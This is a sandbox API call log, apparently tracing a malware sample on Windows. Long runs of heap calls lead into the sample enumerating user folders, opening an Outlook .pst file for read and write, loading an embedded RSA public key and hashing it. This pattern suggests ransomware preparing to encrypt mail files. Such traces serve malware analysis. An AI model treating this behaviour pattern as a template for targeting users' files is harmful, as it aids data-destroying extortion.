RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0101.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0101.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.005] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.005] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.005] PathFindFileNameW (pszPath="") returned="" [0101.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0101.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0101.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0101.006] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.006] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0101.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0101.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.006] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.006] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.006] PathFindFileNameW (pszPath="") returned="" [0101.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.006] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.006] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.007] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0101.007] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0101.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.007] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=271360) returned 1 [0101.007] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.011] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.011] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.012] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.012] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x25805, lpOverlapped=0x0) returned 1 [0101.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.015] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.016] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.016] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.016] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.016] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.016] GetLastError () returned 0x0 [0101.017] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.017] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.017] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.017] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.017] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25810) returned 0x9bb8968 [0101.020] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d70 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5db8 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f38 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f68 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f80 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.020] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f68 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f80 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f80 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.021] 